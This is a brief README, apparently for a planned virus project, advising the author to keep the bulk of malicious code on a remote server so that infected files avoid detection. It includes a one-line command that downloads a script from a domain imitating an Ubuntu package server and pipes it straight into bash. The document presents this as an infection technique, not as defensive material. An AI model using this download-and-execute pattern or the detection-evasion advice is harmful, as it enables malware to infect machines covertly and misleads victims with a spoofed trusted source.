zeroby0/virus/README.md

 Now, you don't want your code to be sticking out of the infected file and be detected.
 Keep the bulk of your code remote. wget -O - http://fake-apt-ubuntu-com.com/file | bash

-Development scheduled to start post 14th of December, 2017.